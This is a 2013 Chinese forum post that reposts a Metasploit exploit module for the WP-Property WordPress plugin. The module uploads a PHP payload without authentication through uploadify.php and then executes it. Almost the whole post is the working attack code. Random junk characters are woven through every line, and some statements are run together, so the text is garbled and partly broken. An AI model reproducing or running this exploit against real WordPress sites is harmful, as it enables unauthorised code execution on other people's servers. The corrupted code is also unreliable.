WordPress WP-Property PHP 文件上传漏洞
6 r) M- B% ]) _$ z7 H: N7 d3 E c0 c, k) h+ N a
## # This file is part of the Metasploit Framework and may be subject to- ~) d! s: ]4 M4 W0 Y. f- u
3 t; k) a j1 D5 }% }! K( z# r
# redistribution and commercial restrictions. Please see the Metasploit
1 ?8 c. T4 c' v- Z; ]" h, |$ @* U: p9 ~+ x5 m
# Framework web site for more information on licensing and terms of use.
* ?9 c; B. }* h4 B2 d! i4 C1 Z% \" _" _/ Q8 P7 ~0 Y) k
# http://metasploit.com/framework/ ##
8 |9 L/ R6 A9 c& Y! z# h
$ \' d' D) y/ `+ E6 f6 S( U6 ]& M9 W
/ ]. c/ b9 {0 b- s9 H' i4 ]: O4 {# Z( A% I7 }" ^- q
) R/ q6 H; v. R
( ^. V; s$ k& P3 }/ erequire 'msf/core'7 t' L2 g9 R7 K% }
require 'msf/core/exploit/php_exe'' N0 P4 ?) ~) T) ]& X
- A. a2 H# e, bclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',. @4 N0 g3 C0 Y7 K1 [: @
'Description' => %q{
! c* u* I, D" T9 e0 h! a) J ~This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>. q+ e( d8 k2 N- R7 i" G
[/ ]2 G9 U4 P; @ r
'Sammy FORGIT', # initial discovery
$ L- w7 R' Q/ H g'James Fitts <fitts.james[at]gmail.com>' # metasploit module1 H$ V2 T2 E% z0 T
],: Z+ l, G# ?1 U8 _- v. N. o
'License' => MSF_LICENSE,0 o6 u- G0 z- U& @* H! ?
'References' =>' t7 l, _# X5 O7 I1 f1 C) s
[
/ j- E4 u& u! v% _& G- z, r[ 'OSVDB', '82656' ], s: B* [8 d5 I5 T' \( u3 b
[ 'BID', '53787' ],4 F7 s7 E2 i9 M7 r& Q' }
[ 'EDB', '18987'],5 V7 j( }8 M3 t0 |
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]1 d. I% @( H- ~' i0 h$ d, ]9 }
],9 d7 `+ a: j' \# O0 _* `& p
'Payload' =>
- H$ O6 E. R( E* l2 }9 Q( O- c{
5 {! U- O4 s+ Z) w! T# H'BadChars' => "\x00",
* }$ x( m8 D/ Z1 k},
& M9 S; w" Z8 m. M# ]$ [& _'Platform' => 'php',
0 c# m) N0 O/ I( X, h'Arch' => ARCH_PHP,3 g+ a& H% Q9 A" ?4 L
'Targets' =>
8 ^* Z2 P+ R5 G& O! e2 B[' G" s0 Y3 q/ c0 @9 E% Q4 [8 X6 z
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
$ |3 k. H) x0 ^" R# [8 b8 |$ g) I[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]# v7 `& v, ~) f0 H% X8 z
],+ F$ l+ K. S2 V) A
'DefaultTarget' => 0,
7 U! J3 m' c3 @( R% B1 t# T, d; A6 I'DisclosureDate' => 'Mar 26 2012'))- o Y1 W) S! k" ]# v
1 M( R! y$ W7 a
register_options(" w6 b0 y! l5 V2 J6 R
[
8 `4 _7 m6 Q- `, e: |5 c/ s; \OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])' X% q9 G g4 d6 {) L
], self.class)
- w6 w9 V/ r% {# D9 D9 X. P- _end
/ ^" c" `0 n y$ z9 D; ?7 W, a! s5 t# I2 N
def check
/ `4 Y' O8 _. puri = target_uri.path
" f/ s1 x( E/ m; X6 Muri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
" \$ a, F% @) S/ D- C: O'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
3 {' y$ g1 V1 ?& Q6 X2 s, y. r}); G, q9 }! z Y2 i
' a5 |! N( y8 d2 H7 I
if not res or res.code != 2006 K O, ^ b6 ^. N3 \3 E3 W
return Exploit::CheckCode::Unknown* v6 P2 D- x) z2 q! A% r& j
end
4 R' S/ H+ M* P# X! Q8 u. ^( G& D
! b6 s; j( h$ x+ N- freturn Exploit::CheckCode::Appears
7 Y3 V, @. Y; _+ xend+ G* H8 k" u: ^; A8 q! N: n
2 y% r# O) g- K! ]5 h F" Fdef exploit
7 u7 t- U, {, k5 ]% i wuri = target_uri.path
/ F% P- e% O; a, ^9 _5 o% ^7 yuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)7 j1 {$ c/ x' \" J9 Y
$ k, d. U# ]4 m
data = Rex::MIME::Message.new
: v m6 w7 |- Gdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")4 v: c+ x \7 C$ h9 ] |6 N
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
# ]* R3 A1 P5 Vpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'). W+ b! W0 K! i! _
+ {# J/ b1 t! y9 C- iprint_status("#{peer} - Uploading payload #{@payload_name}")* z; w" I( e9 I4 T* g* j2 W0 l
res = send_request_cgi({
( B' M' l- x( ^3 u* r'method' => 'POST',
^9 z# k- j7 ^* G5 }& i'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",/ d3 _' z4 t% u- r5 f# T
'ctype' => "multipart/form-data; boundary=#{data.bound}",
, N1 T5 _2 G1 Q' U, w'data' => post_data6 _ q, D! X ~8 E
})6 T0 F/ I( l3 n3 A; {" ]
" m5 {, g0 O3 O7 f. C8 qif not res or res.code != 200 or res.body !~ /#{@payload_name}/1 p$ t( w! \ ~! H; @/ _# h! ~
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
' F! h0 q1 w' D% mend
" w, |0 ~7 |( s: M) w- R/ [+ G) G& L3 G8 i' e% @: X
upload_uri = res.body& {; k3 b( v5 A7 z& t+ p8 ?+ @( Y; t
4 j% Y# i- t- u; Zprint_status("#{peer} - Executing payload #{@payload_name}")
3 ]4 q1 _, S0 cres = send_request_raw({7 q$ O+ f8 `" S# S
'uri' => upload_uri,; Y8 d, H Y% i/ k; W; {
'method' => 'GET'
y1 p% b2 B' k0 m})7 Q4 t/ T5 p- {% z0 u
end# L# c, m6 p" q
end
; R3 j) O( {1 c5 q, Z% f- |; I1 x6 _
h$ |$ C0 O8 ~% g5 B4 h* @. g不要问我这写的是什么 怎么利用 我是说msf.6 F0 M, d8 F7 E+ d
1 v- \- n. l: Q
|
发表于 2013-1-4 19:51:30
收藏
支持
反对